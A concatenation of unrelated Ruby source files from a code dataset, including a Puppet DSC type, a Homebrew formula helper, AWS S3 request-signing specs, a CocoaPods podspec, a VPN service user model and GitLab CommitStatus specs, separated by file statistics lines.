unless (value.kind_of?(Numeric) && value >= 0) || (value.to_i.to_s == value && value.to_i >= 0)
fail("Invalid value #{value}. Should be a unsigned Integer")
end
end
munge do |value|
PuppetX::Dsc::TypeHelpers.munge_integer(value)
end
end
# Name: InstallAccount
# Type: MSFT_Credential
# IsMandatory: False
# Values: None
newparam(:dsc_installaccount) do
def mof_type; 'MSFT_Credential' end
def mof_is_embedded?; true end
desc "InstallAccount - POWERSHELL 4 ONLY: The account to run this resource as, use PsDscRunAsCredential if using PowerShell 5"
validate do |value|
unless value.kind_of?(Hash)
fail("Invalid value '#{value}'. Should be a hash")
end
PuppetX::Dsc::TypeHelpers.validate_MSFT_Credential("InstallAccount", value)
end
end
def builddepends
pending_relations = super()
PuppetX::Dsc::TypeHelpers.ensure_reboot_relationship(self, pending_relations)
end
end
Puppet::Type.type(:dsc_spdistributedcacheclientsettings).provide :powershell, :parent => Puppet::Type.type(:base_dsc).provider(:powershell) do
confine :true => (Gem::Version.new(Facter.value(:powershell_version)) >= Gem::Version.new('5.0.10586.117'))
defaultfor :operatingsystem => :windows
mk_resource_methods
end
| 34.387597 | 142 | 0.656492 |
e82d1c701f2ef891c652ddcfa13b29e6cdc1eb06
| 1,649 |
Rails.application.routes.draw do
resources :picture_stores
resources :stores
# The priority is based upon order of creation: first created -> highest priority.
# See how all your routes lay out with "rake routes".
# You can have the root of your site routed with "root"
# root 'welcome#index'
# Example of regular route:
# get 'products/:id' => 'catalog#view'
# Example of named route that can be invoked with purchase_url(id: product.id)
# get 'products/:id/purchase' => 'catalog#purchase', as: :purchase
# Example resource route (maps HTTP verbs to controller actions automatically):
# resources :products
# Example resource route with options:
# resources :products do
# member do
# get 'short'
# post 'toggle'
# end
#
# collection do
# get 'sold'
# end
# end
# Example resource route with sub-resources:
# resources :products do
# resources :comments, :sales
# resource :seller
# end
# Example resource route with more complex sub-resources:
# resources :products do
# resources :comments
# resources :sales do
# get 'recent', on: :collection
# end
# end
# Example resource route with concerns:
# concern :toggleable do
# post 'toggle'
# end
# resources :posts, concerns: :toggleable
# resources :photos, concerns: :toggleable
# Example resource route within a namespace:
# namespace :admin do
# # Directs /admin/products/* to Admin::ProductsController
# # (app/controllers/admin/products_controller.rb)
# resources :products
# end
end
| 27.949153 | 84 | 0.651304 |
bb513a9920d5dec080cc63918b1a1b80a354d380
| 3,647 |
require "formula"
class FormulaVersions
IGNORED_EXCEPTIONS = [
ArgumentError, NameError, SyntaxError, TypeError,
FormulaSpecificationError, FormulaValidationError,
ErrorDuringExecution, LoadError, MethodDeprecatedError
].freeze
MAX_VERSIONS_DEPTH = 2
attr_reader :name, :path, :repository, :entry_name
def initialize(formula)
@name = formula.name
@path = formula.path
@repository = formula.tap.path
@entry_name = @path.relative_path_from(repository).to_s
@current_formula = formula
@formula_at_revision = {}
puts "[my debug] Initialized new formula #{formula} with @name #{@name}, @path #{@path}, @repository #{@repository}, @entry_name #{@entry_name}, @current_formula #{@current_formula}, @formula_at_revision #{@formula_at_revision}\n"
end
def rev_list(branch)
repository.cd do
Utils.popen_read("git", "rev-list", "--abbrev-commit", "--remove-empty", branch, "--", entry_name) do |io|
yield io.readline.chomp until io.eof?
end
end
end
def file_contents_at_revision(rev)
repository.cd { Utils.popen_read("git", "cat-file", "blob", "#{rev}:#{entry_name}") }
end
def formula_at_revision(rev)
Homebrew.raise_deprecation_exceptions = true
yield @formula_at_revision[rev] ||= begin
contents = file_contents_at_revision(rev)
nostdout { Formulary.from_contents(name, path, contents) }
end
rescue *IGNORED_EXCEPTIONS => e
# We rescue these so that we can skip bad versions and
# continue walking the history
ohai "#{e} in #{name} at revision #{rev}", e.backtrace if ARGV.debug?
rescue FormulaUnavailableError
nil
ensure
Homebrew.raise_deprecation_exceptions = false
end
def bottle_version_map(branch)
map = Hash.new { |h, k| h[k] = [] }
versions_seen = 0
rev_list(branch) do |rev|
formula_at_revision(rev) do |f|
bottle = f.bottle_specification
map[f.pkg_version] << bottle.rebuild unless bottle.checksums.empty?
versions_seen = (map.keys + [f.pkg_version]).uniq.length
end
return map if versions_seen > MAX_VERSIONS_DEPTH
end
map
end
def previous_version_and_checksum(branch)
map = {}
rev_list(branch) do |rev|
formula_at_revision(rev) do |f|
[:stable, :devel].each do |spec_sym|
next unless spec = f.send(spec_sym)
map[spec_sym] ||= { version: spec.version, checksum: spec.checksum }
end
end
break if map[:stable] || map[:devel]
end
map[:stable] ||= {}
map[:devel] ||= {}
map
end
def version_attributes_map(attributes, branch)
attributes_map = {}
return attributes_map if attributes.empty?
attributes.each do |attribute|
attributes_map[attribute] ||= {
stable: {},
devel: {},
}
end
stable_versions_seen = 0
rev_list(branch) do |rev|
formula_at_revision(rev) do |f|
attributes.each do |attribute|
map = attributes_map[attribute]
set_attribute_map(map, f, attribute)
stable_keys_length = (map[:stable].keys + [f.version]).uniq.length
stable_versions_seen = [stable_versions_seen, stable_keys_length].max
end
end
break if stable_versions_seen > MAX_VERSIONS_DEPTH
end
attributes_map
end
private
def set_attribute_map(map, f, attribute)
if f.stable
map[:stable][f.stable.version] ||= []
map[:stable][f.stable.version] << f.send(attribute)
end
return unless f.devel
map[:devel][f.devel.version] ||= []
map[:devel][f.devel.version] << f.send(attribute)
end
end
| 27.839695 | 234 | 0.659446 |
38f06b4a07dcabf7424061a2801d8e81107c5fc0
| 11,363 |
# Copyright 2011-2013 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
require 'spec_helper'
require 'digest/md5'
module AWS
class S3
describe Request do
let(:request) { Request.new }
context '#key' do
it 'accepts a key' do
request.key = 'key'
request.key.should == 'key'
end
end
context '#bucket' do
it 'accepts a bucket' do
request.bucket = 'key'
request.bucket.should == 'key'
end
end
context '#path' do
it 'defaults to /' do
request.path.should == '/'
end
it 'is / for dns compat bucket names with no key' do
request.bucket = 'bucket'
request.path.should == '/'
end
it 'includes dns incompatable bucket names' do
request.bucket = 'foo_bar'
request.path.should == '/foo_bar'
end
it 'includes keys but not dns compat bucket name' do
request.bucket = 'bucket'
request.key = 'key'
request.path.should == '/key'
end
it 'combines keys and dns-incompatible bucket names' do
request.bucket = 'foo_bar'
request.key = 'key'
request.path.should == '/foo_bar/key'
end
it 'should URI-encode the key' do
request.bucket = "foo_bar"
request.key = "key with spaces"
request.path.should == "/foo_bar/key%20with%20spaces"
end
if String.instance_methods.include?(:encoding)
it 'should URI-encode the key' do
request.bucket = "foo_bar"
request.key = "key\u1234"
request.path.should == "/foo_bar/key%E1%88%B4"
end
end
it 'should not URI-encode path separators in the key' do
request.bucket = "foo_bar"
request.key = "key/foo bla"
request.path.should == "/foo_bar/key/foo%20bla"
end
it 'should not remove prefixed slashes' do
request.bucket = 'foo_bar' #not uri safe
request.key = '//double/slashes/'
request.path.should == '/foo_bar///double/slashes/'
end
it 'should not remove prefixed slashes' do
request.bucket = 'foo' #uri safe
request.key = '//double/slashes/'
request.path.should == '///double/slashes/'
end
it 'should accept a path of only slashes' do
request.bucket = 'foo_bar' #not uri safe
request.key = '////'
request.path.should == '/foo_bar/////'
end
it 'should accept a path of only slashes' do
request.bucket = 'foo' #uri safe
request.key = '////'
request.path.should == '/////'
end
it 'should preserve a trailing slash in the key' do
request.bucket = "foo_bar"
request.key = "key/foo bla/"
request.path.should == "/foo_bar/key/foo%20bla/"
end
end
context '#uri' do
it 'contains the path followed by the querystring params' do
request.bucket = 'foo_bar'
request.key = 'key'
request.add_param('k', 'v')
request.uri.should == '/foo_bar/key?k=v'
end
it 'omits dns compat bucket names' do
request.bucket = 'foo'
request.key = 'key'
request.add_param('k', 'v')
request.uri.should == '/key?k=v'
end
end
context '#host' do
it 'should contain dns compat bucket names and endpoint' do
request = Request.new
request.bucket = 'my-bucket'
request.host = 's3.com'
request.host.should == 'my-bucket.s3.com'
end
it 'should not contain dns compat bucket names that have periods' do
request = Request.new
request.bucket = 'my.bucket'
request.host = 's3.com'
request.host.should == 's3.com'
end
end
context '#add_authorization!' do
let(:credential_provider) {
Core::CredentialProviders::StaticProvider.new({
:access_key_id => 'KEY',
:secret_access_key => 'SECRET',
:session_token => 'TOKEN',
})
}
context 'credentials does not provide a session token' do
it 'should not add the x-amz-security-token header' do
credential_provider.stub(:session_token).and_return(nil)
request.add_authorization!(credential_provider)
request.headers.
should_not include("x-amz-security-token")
end
end
context 'signer has a session token configured' do
it 'should add the x-amz-security-token header prior to computing the signature' do
Core::Signer.should_receive(:sign) do |*args|
request.headers["x-amz-security-token"].should == "TOKEN"
"SIGNATURE"
end
request.add_authorization!(credential_provider)
end
end
end
context '#string_to_sign' do
let(:verb) { 'PUT' }
let(:body) { 'hello world' }
let(:md5) { Digest::MD5.hexdigest(body) }
let(:content_type) { 'text/plain' }
let(:date) { Time.now.httpdate }
let(:request) {
req = Request.new
req.bucket = 'some_bucket'
req.key = 'some/path'
req.http_method = verb
req.body = body
req.headers['Content-MD5'] = md5
req.headers['Content-Type'] = content_type
req.headers['Date'] = date
req.headers['x-amz-meta-Color'] = 'red'
req.headers['x-amz-meta-Users'] = 'Fred,Barney'
req.add_param('acl')
req.add_param('policy')
req
}
let(:signing_string_lines) { request.string_to_sign.split(/\n/) }
it 'line 1 is the http verb' do
signing_string_lines[0].should == verb
end
it 'line 2 is the content md5' do
signing_string_lines[1].should == md5
end
it 'line 3 is the content type' do
signing_string_lines[2].should == content_type
end
it 'line 4 is the date' do
signing_string_lines[3].should == date
end
it 'lines 5 till the end -1 are the canonicalized amazon headers' do
everything_else = Array(signing_string_lines[4..-2]).join("\n")
everything_else.should == request.canonicalized_headers
end
it 'the last line is the canonicalized resource' do
signing_string_lines[-1].should == request.canonicalized_resource
end
end
context '#canonicalized resource' do
it 'should begin with a slash' do
Request.new.canonicalized_resource.should match(/^\//)
end
it 'should begin with the bucket if it is not dns compat' do
req = Request.new
req.bucket = 'dns_incompat'
req.key = 'some/path'
req.canonicalized_resource.should == '/dns_incompat/some/path'
end
it 'should begin with the path if the host is dns compat' do
req = Request.new
req.bucket = 'dns-compat'
req.key = 'a/key'
req.canonicalized_resource.should match(/^\/dns-compat\/a\/key$/)
end
it 'should sort sub resources' do
req = Request.new
req.add_param('versions')
req.add_param('acl')
req.canonicalized_resource.should == "/?acl&versions"
end
it 'should include parameters controlling the response headers' do
req = Request.new
req.add_param('response-expires', 'tomorrow')
req.add_param('response-content-type', 'foo')
req.canonicalized_resource.
should == "/?response-content-type=foo&response-expires=tomorrow"
end
end
context '(S3 developer guide examples)' do
let(:request) { Request.new }
it 'should produce the right string for GET object' do
request.http_method = "GET"
request.bucket = "johnsmith"
request.key = "photos/puppy.jpg"
request.headers["Date"] = "Tue, 27 Mar 2007 19:36:42 +0000"
request.string_to_sign.should == <<END.strip
GET
Tue, 27 Mar 2007 19:36:42 +0000
/johnsmith/photos/puppy.jpg
END
end
it 'should produce the right string for PUT object' do
request.http_method = "PUT"
request.bucket = "johnsmith"
request.key = "photos/puppy.jpg"
request.headers["Date"] = "Tue, 27 Mar 2007 21:15:45 +0000"
request.headers["Content-Type"] = "image/jpeg"
request.string_to_sign.should == <<END.strip
PUT
image/jpeg
Tue, 27 Mar 2007 21:15:45 +0000
/johnsmith/photos/puppy.jpg
END
end
it 'should produce the right string for GET bucket' do
request.http_method = "GET"
request.bucket = "johnsmith"
request.add_param('prefix', 'photos')
request.add_param('max-keys', 50)
request.add_param('marker', 'puppy')
request.headers["Date"] = "Tue, 27 Mar 2007 19:42:41 +0000"
request.string_to_sign.should == <<END.strip
GET
Tue, 27 Mar 2007 19:42:41 +0000
/johnsmith/
END
end
it 'places dns compat names into the path when they contain .' do
request.http_method = "GET"
request.bucket = "my.bucket.name"
request.headers["Date"] = "Tue, 27 Mar 2007 19:42:41 +0000"
request.string_to_sign.should == <<END.strip
GET
Tue, 27 Mar 2007 19:42:41 +0000
/my.bucket.name
END
end
it 'should produce the right string for GET service' do
request.http_method = "GET"
request.headers["Date"] = "Wed, 28 Mar 2007 01:29:59 +0000"
request.string_to_sign.should == <<END.strip
GET
Wed, 28 Mar 2007 01:29:59 +0000
/
END
end
it 'should add a Date header if not provided' do
fake_date = 'Mon, 1 Jan 1234 12:34:56 +0000'
Time.stub_chain(:now, :httpdate).and_return(fake_date)
request.string_to_sign
request.headers['Date'].should == fake_date
end
it 'should omit the date line when provided via x-amz-date' do
request.http_method = 'DELETE'
request.bucket = 'johnsmith'
request.key = 'photos/puppy.jpg'
request.headers["Date"] = 'Tue, 27 Mar 2007 21:20:27 +0000'
request.headers['User-Agent'] = 'dotnet'
request.headers['X-Amz-Date'] = 'Tue, 27 Mar 2007 21:20:26 +0000'
request.headers['X-Amz-abc'] = 'xyz'
request.string_to_sign.should == <<END.strip
DELETE
x-amz-abc:xyz
x-amz-date:Tue, 27 Mar 2007 21:20:26 +0000
/johnsmith/photos/puppy.jpg
END
end
end
end
end
end
| 29.210797 | 93 | 0.579072 |
623c0799e29f6e9cf9fe00ee797d7ad1e6d5a9a2
| 597 |
require_relative 'boot'
require 'rails/all'
# Require the gems listed in Gemfile, including any gems
# you've limited to :test, :development, or :production.
Bundler.require(*Rails.groups)
module RegionData
class Application < Rails::Application
# Initialize configuration defaults for originally generated Rails version.
config.load_defaults 5.1
# Settings in config/environments/* take precedence over those specified here.
# Application configuration should go into files in config/initializers
# -- all .rb files in that directory are automatically loaded.
end
end
| 31.421053 | 82 | 0.767169 |
036ac30106e8c79b3334b3c53c5da3d54cae06a7
| 5,205 |
#
# Be sure to run `pod spec lint ReKognition_iOS_SDK.podspec' to ensure this is a
# valid spec and to remove all comments including this before submitting the spec.
#
# To learn more about Podspec attributes see http://docs.cocoapods.org/specification.html
# To see working Podspecs in the CocoaPods repo see https://github.com/CocoaPods/Specs/
#
Pod::Spec.new do |s|
# ――― Spec Metadata ―――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# These will help people to find your library, and whilst it
# can feel like a chore to fill in it's definitely to your advantage. The
# summary should be tweet-length, and the description more in depth.
#
s.name = "ReKognition_iOS_SDK"
s.version = "0.0.2"
s.summary = "ReKognition iOS SDK as pod. See https://github.com/orbeus/ReKognition_iOS_SDK for reference."
s.description = <<-DESC
A longer description of ReKognition_iOS_SDK in Markdown format.
* Think: Why did you write this? What is the focus? What does it do?
* CocoaPods will be using this to generate tags, and improve search results.
* Try to keep it short, snappy and to the point.
* Finally, don't worry about the indent, CocoaPods strips it!
DESC
s.homepage = "https://github.com/airspeed/ReKognition_iOS_SDK"
# s.screenshots = "www.example.com/screenshots_1.gif", "www.example.com/screenshots_2.gif"
# ――― Spec License ――――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# Licensing your code is important. See http://choosealicense.com for more info.
# CocoaPods will detect a license file if there is a named LICENSE*
# Popular ones are 'MIT', 'BSD' and 'Apache License, Version 2.0'.
#
s.license = { :type => "MIT", :file => "LICENSE" }
# ――― Author Metadata ――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# Specify the authors of the library, with email addresses. Email addresses
# of the authors are extracted from the SCM log. E.g. $ git log. CocoaPods also
# accepts just a name if you'd rather not provide an email address.
#
# Specify a social_media_url where others can refer to, for example a twitter
# profile URL.
#
s.author = { "airspeed" => "[email protected]" }
# Or just: s.author = "airspeed"
# s.authors = { "airspeed" => "[email protected]" }
# s.social_media_url = "http://twitter.com/airspeed"
# ――― Platform Specifics ――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# If this Pod runs only on iOS or OS X, then specify the platform and
# the deployment target. You can optionally include the target after the platform.
#
s.platform = :ios
# s.platform = :ios, "5.0"
# When using multiple platforms
# s.ios.deployment_target = "5.0"
# s.osx.deployment_target = "10.7"
# ――― Source Location ―――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# Specify the location from where the source should be retrieved.
# Supports git, hg, bzr, svn and HTTP.
#
s.source = { :git => "https://github.com/airspeed/ReKognition_iOS_SDK.git", :tag => '0.0.2' }
# ――― Source Code ―――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# CocoaPods is smart about how it includes source code. For source files
# giving a folder will include any h, m, mm, c & cpp files. For header
# files it will include any header in the folder.
# Not including the public_header_files will make all headers public.
#
s.source_files = "SDK", "SDK/**/*.{h,m}"
#s.exclude_files = "Classes/Exclude"
# s.public_header_files = "Classes/**/*.h"
# ――― Resources ―――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# A list of resources included with the Pod. These are copied into the
# target bundle with a build phase script. Anything else will be cleaned.
# You can preserve files from being cleaned, please don't preserve
# non-essential files like tests, examples and documentation.
#
# s.resource = "icon.png"
# s.resources = "Resources/*.png"
# s.preserve_paths = "FilesToSave", "MoreFilesToSave"
# ――― Project Linking ―――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# Link your library with frameworks, or libraries. Libraries do not include
# the lib prefix of their name.
#
# s.framework = "SomeFramework"
# s.frameworks = "SomeFramework", "AnotherFramework"
s.frameworks = "ImageIO", "AssetsLibrary", "Foundation", "UIKit", "CoreImage", "CoreGraphics", "QuartzCore"
# s.library = "iconv"
# s.libraries = "iconv", "xml2"
# ――― Project Settings ――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# If your library depends on compiler flags you can set them in the xcconfig hash
# where they will only apply to your library. If you depend on other Podspecs
# you can include multiple dependencies to ensure it works.
# s.requires_arc = true
# s.xcconfig = { "HEADER_SEARCH_PATHS" => "$(SDKROOT)/usr/include/libxml2" }
# s.dependency "JSONKit", "~> 1.4"
end
| 37.992701 | 113 | 0.589625 |
389da3a0f0729c6339693ada6f5661e39ca53e00
| 675 |
class Plaintext::Rails::RegisterController < ApplicationController
def start
puts '====> Regsistration Start'
params = JSON.parse(request.raw_post)
puts params
beta, v, pub_s = Plaintext::Registration::start(
params["username"], params["alpha"]
)
puts "******************************"
puts "Beta: #{beta}"
render json: { beta: beta, v: v, pub_s: pub_s }
end
def finalize
puts '====> Registration Final'
params = JSON.parse(request.raw_post)
puts params
Plaintext::Registration::finalize(
params["username"], params["pub_u"], params["auth_env"]
)
render json: { registration: "success" }
end
end
| 25.961538 | 66 | 0.611852 |
f74972de3a9938c05f60da93c35118d849e3e7be
| 5,236 |
# frozen_string_literal: true
class User < ActiveRecord::Base
include AASM
include LastDaysFilterable
BILLING_INTERVAL = 30
DEFAULT_TEST_PERIOD = 3
devise :database_authenticatable, :registerable,
:recoverable, :rememberable, :trackable, :validatable, :confirmable, :lockable
attr_accessor :accept_agreement
belongs_to :plan
belongs_to :referrer, class_name: 'User'
has_many :referrals, foreign_key: 'referrer_id', class_name: 'User'
has_many :payments
has_many :withdrawals
has_many :connects
has_many :disconnects
has_many :promotions
# TODO:
# strange pool of relations.
# needs to be refactored
has_many :user_options
has_many :enabled_user_options, -> { enabled }, foreign_key: 'user_id', class_name: 'UserOption'
has_many :options, -> { active }, through: :enabled_user_options
has_many :subscribed_options, -> { active }, through: :user_options, class_name: 'Option'
validates :plan_id, presence: true
validates :accept_agreement, acceptance: true, on: :create
validate :selected_plan_is_regular, on: :create
before_create :generate_vpn_credentials, :generate_reflink
after_create :add_to_newsletter
scope :active_referrers, -> { joins('INNER JOIN users AS referrals ON referrals.referrer_id=users.id').distinct }
scope :payers, -> { where(id: Payment.select(:user_id)) }
scope :this_month_payers, lambda {
where('id IN (
SELECT user_id
FROM payments
WHERE created_at >= ? AND created_at <= ?)
', Date.current.beginning_of_month, Date.current.end_of_month)
}
scope :non_paid_users, lambda {
where('id NOT IN (
SELECT user_id
FROM withdrawals
WHERE (DATE(?) - DATE(withdrawals.created_at)) < ?)
', Time.current, BILLING_INTERVAL).order('id ASC')
}
scope :never_paid, -> { where('id NOT IN (SELECT user_id FROM withdrawals)') }
ransacker :never_paid, callable: NeverPaidUsersRansacker
aasm column: :state do
state :active, initial: true
state :disabled
event :disable do
transitions from: :active, to: :disabled
end
event :activate do
transitions from: :disabled, to: :active
end
end
def to_s
email
end
def referrer_account
Referrer::Account.new(id)
end
def test_period
TestPeriod.new(self)
end
def connected?
Connector.connected? self
end
def paid?
last_withdrawal && (((Time.current - last_withdrawal_date).to_i / 1.day) < current_billing_interval_length)
end
def current_billing_interval_length
BILLING_INTERVAL + interval_prolongation
end
def last_connect
connects.last
end
def last_connect_date
last_connect.try :created_at
end
def last_withdrawal
withdrawals.last
end
def last_withdrawal_date
last_withdrawal.try :created_at
end
def next_withdrawal_date
last_withdrawal_date + current_billing_interval_length.days if last_withdrawal
end
def increase_balance(amount)
self.class.where(id: id).update_all(['balance = balance + ?', amount])
IncreaseBalanceMailWorker.perform_async(amount, id)
end
def decrease_balance(amount)
self.class.where(id: id).update_all(['balance = balance - ?', amount])
DecreaseBalanceMailWorker.perform_async(amount, id)
end
def service_enabled?
paid? || false
end
def total_amount
payments.accepted.sum(:usd_amount)
end
private
def interval_prolongation
last_withdrawal ? last_withdrawal.prolongation_days : 0
end
def selected_plan_is_regular
errors.add(:plan_id, I18n.t('activerecord.validations.user.regular_plan')) unless plan&.regular?
end
def generate_reflink
self.reflink = Signer.hashify_string(email)
end
def generate_vpn_credentials
self.vpn_login = Signer.hashify_string(email)
self.vpn_password = RandomString.generate(12)
end
def add_to_newsletter
AddUserToNewsletterWorker.perform_async(email, :all)
end
end
# == Schema Information
#
# Table name: users
#
# id :integer not null, primary key
# email :string(255) default(""), not null
# encrypted_password :string(255) default(""), not null
# reset_password_token :string(255)
# reset_password_sent_at :datetime
# remember_created_at :datetime
# sign_in_count :integer default(0)
# current_sign_in_at :datetime
# last_sign_in_at :datetime
# current_sign_in_ip :string(255)
# last_sign_in_ip :string(255)
# confirmation_token :string(255)
# confirmed_at :datetime
# confirmation_sent_at :datetime
# unconfirmed_email :string(255)
# failed_attempts :integer default(0)
# unlock_token :string(255)
# locked_at :datetime
# created_at :datetime
# updated_at :datetime
# balance :decimal(, ) default(0.0)
# plan_id :integer
# vpn_login :string(255)
# vpn_password :string(255)
# state :string(255)
# can_not_withdraw_counter :integer default(0)
#
| 27.413613 | 115 | 0.675707 |
917685399d43dfa8d48632804b68605775f19325
| 16,673 |
require 'spec_helper'
describe CommitStatus do
set(:project) { create(:project, :repository) }
set(:pipeline) do
create(:ci_pipeline, project: project, sha: project.commit.id)
end
let(:commit_status) { create_status(stage: 'test') }
def create_status(**opts)
create(:commit_status, pipeline: pipeline, **opts)
end
it { is_expected.to belong_to(:pipeline) }
it { is_expected.to belong_to(:user) }
it { is_expected.to belong_to(:project) }
it { is_expected.to belong_to(:auto_canceled_by) }
it { is_expected.to validate_presence_of(:name) }
it { is_expected.to validate_inclusion_of(:status).in_array(%w(pending running failed success canceled)) }
it { is_expected.to delegate_method(:sha).to(:pipeline) }
it { is_expected.to delegate_method(:short_sha).to(:pipeline) }
it { is_expected.to respond_to :success? }
it { is_expected.to respond_to :failed? }
it { is_expected.to respond_to :running? }
it { is_expected.to respond_to :pending? }
describe '#author' do
subject { commit_status.author }
before do
commit_status.author = User.new
end
it { is_expected.to eq(commit_status.user) }
end
describe 'status state machine' do
let!(:commit_status) { create(:commit_status, :running, project: project) }
it 'invalidates the cache after a transition' do
expect(ExpireJobCacheWorker).to receive(:perform_async).with(commit_status.id)
commit_status.success!
end
end
describe '#started?' do
subject { commit_status.started? }
context 'without started_at' do
before do
commit_status.started_at = nil
end
it { is_expected.to be_falsey }
end
%w[running success failed].each do |status|
context "if commit status is #{status}" do
before do
commit_status.status = status
end
it { is_expected.to be_truthy }
end
end
%w[pending canceled].each do |status|
context "if commit status is #{status}" do
before do
commit_status.status = status
end
it { is_expected.to be_falsey }
end
end
end
describe '#active?' do
subject { commit_status.active? }
%w[pending running].each do |state|
context "if commit_status.status is #{state}" do
before do
commit_status.status = state
end
it { is_expected.to be_truthy }
end
end
%w[success failed canceled].each do |state|
context "if commit_status.status is #{state}" do
before do
commit_status.status = state
end
it { is_expected.to be_falsey }
end
end
end
describe '#complete?' do
subject { commit_status.complete? }
%w[success failed canceled].each do |state|
context "if commit_status.status is #{state}" do
before do
commit_status.status = state
end
it { is_expected.to be_truthy }
end
end
%w[pending running].each do |state|
context "if commit_status.status is #{state}" do
before do
commit_status.status = state
end
it { is_expected.to be_falsey }
end
end
end
describe '#cancel' do
subject { job.cancel }
context 'when status is scheduled' do
let(:job) { build(:commit_status, :scheduled) }
it 'updates the status' do
subject
expect(job).to be_canceled
end
end
end
describe '#auto_canceled?' do
subject { commit_status.auto_canceled? }
context 'when it is canceled' do
before do
commit_status.update(status: 'canceled')
end
context 'when there is auto_canceled_by' do
before do
commit_status.update(auto_canceled_by: create(:ci_empty_pipeline))
end
it 'is auto canceled' do
is_expected.to be_truthy
end
end
context 'when there is no auto_canceled_by' do
it 'is not auto canceled' do
is_expected.to be_falsey
end
end
end
end
describe '#duration' do
subject { commit_status.duration }
it { is_expected.to eq(120.0) }
context 'if the building process has not started yet' do
before do
commit_status.started_at = nil
commit_status.finished_at = nil
end
it { is_expected.to be_nil }
end
context 'if the building process has started' do
before do
commit_status.started_at = Time.now - 1.minute
commit_status.finished_at = nil
end
it { is_expected.to be_a(Float) }
it { is_expected.to be > 0.0 }
end
end
describe '.latest' do
subject { described_class.latest.order(:id) }
let(:statuses) do
[create_status(name: 'aa', ref: 'bb', status: 'running', retried: true),
create_status(name: 'cc', ref: 'cc', status: 'pending', retried: true),
create_status(name: 'aa', ref: 'cc', status: 'success', retried: true),
create_status(name: 'cc', ref: 'bb', status: 'success'),
create_status(name: 'aa', ref: 'bb', status: 'success')]
end
it 'returns unique statuses' do
is_expected.to eq(statuses.values_at(3, 4))
end
end
describe '.retried' do
subject { described_class.retried.order(:id) }
let(:statuses) do
[create_status(name: 'aa', ref: 'bb', status: 'running', retried: true),
create_status(name: 'cc', ref: 'cc', status: 'pending', retried: true),
create_status(name: 'aa', ref: 'cc', status: 'success', retried: true),
create_status(name: 'cc', ref: 'bb', status: 'success'),
create_status(name: 'aa', ref: 'bb', status: 'success')]
end
it 'returns unique statuses' do
is_expected.to contain_exactly(*statuses.values_at(0, 1, 2))
end
end
describe '.running_or_pending' do
subject { described_class.running_or_pending.order(:id) }
let(:statuses) do
[create_status(name: 'aa', ref: 'bb', status: 'running'),
create_status(name: 'cc', ref: 'cc', status: 'pending'),
create_status(name: 'aa', ref: nil, status: 'success'),
create_status(name: 'dd', ref: nil, status: 'failed'),
create_status(name: 'ee', ref: nil, status: 'canceled')]
end
it 'returns statuses that are running or pending' do
is_expected.to contain_exactly(*statuses.values_at(0, 1))
end
end
describe '.after_stage' do
subject { described_class.after_stage(0) }
let(:statuses) do
[create_status(name: 'aa', stage_idx: 0),
create_status(name: 'cc', stage_idx: 1),
create_status(name: 'aa', stage_idx: 2)]
end
it 'returns statuses from second and third stage' do
is_expected.to eq(statuses.values_at(1, 2))
end
end
describe '.exclude_ignored' do
subject { described_class.exclude_ignored.order(:id) }
let(:statuses) do
[create_status(when: 'manual', status: 'skipped'),
create_status(when: 'manual', status: 'success'),
create_status(when: 'manual', status: 'failed'),
create_status(when: 'on_failure', status: 'skipped'),
create_status(when: 'on_failure', status: 'success'),
create_status(when: 'on_failure', status: 'failed'),
create_status(allow_failure: true, status: 'success'),
create_status(allow_failure: true, status: 'failed'),
create_status(allow_failure: false, status: 'success'),
create_status(allow_failure: false, status: 'failed'),
create_status(allow_failure: true, status: 'manual'),
create_status(allow_failure: false, status: 'manual')]
end
it 'returns statuses without what we want to ignore' do
is_expected.to eq(statuses.values_at(0, 1, 2, 3, 4, 5, 6, 8, 9, 11))
end
end
describe '.failed_but_allowed' do
subject { described_class.failed_but_allowed.order(:id) }
let(:statuses) do
[create_status(allow_failure: true, status: 'success'),
create_status(allow_failure: true, status: 'failed'),
create_status(allow_failure: false, status: 'success'),
create_status(allow_failure: false, status: 'failed'),
create_status(allow_failure: true, status: 'canceled'),
create_status(allow_failure: false, status: 'canceled'),
create_status(allow_failure: true, status: 'manual'),
create_status(allow_failure: false, status: 'manual')]
end
it 'returns statuses without what we want to ignore' do
is_expected.to eq(statuses.values_at(1, 4))
end
end
describe '.status' do
context 'when there are multiple statuses present' do
before do
create_status(status: 'running')
create_status(status: 'success')
create_status(allow_failure: true, status: 'failed')
end
it 'returns a correct compound status' do
expect(described_class.all.status).to eq 'running'
end
end
context 'when there are only allowed to fail commit statuses present' do
before do
create_status(allow_failure: true, status: 'failed')
end
it 'returns status that indicates success' do
expect(described_class.all.status).to eq 'success'
end
end
context 'when using a scope to select latest statuses' do
before do
create_status(name: 'test', retried: true, status: 'failed')
create_status(allow_failure: true, name: 'test', status: 'failed')
end
it 'returns status according to the scope' do
expect(described_class.latest.status).to eq 'success'
end
end
end
describe '#before_sha' do
subject { commit_status.before_sha }
context 'when no before_sha is set for pipeline' do
before do
pipeline.before_sha = nil
end
it 'returns blank sha' do
is_expected.to eq(Gitlab::Git::BLANK_SHA)
end
end
context 'for before_sha set for pipeline' do
let(:value) { '1234' }
before do
pipeline.before_sha = value
end
it 'returns the set value' do
is_expected.to eq(value)
end
end
end
describe '#commit' do
it 'returns commit pipeline has been created for' do
expect(commit_status.commit).to eq project.commit
end
end
describe '#group_name' do
subject { commit_status.group_name }
tests = {
'rspec:windows' => 'rspec:windows',
'rspec:windows 0' => 'rspec:windows 0',
'rspec:windows 0 test' => 'rspec:windows 0 test',
'rspec:windows 0 1' => 'rspec:windows',
'rspec:windows 0 1 name' => 'rspec:windows name',
'rspec:windows 0/1' => 'rspec:windows',
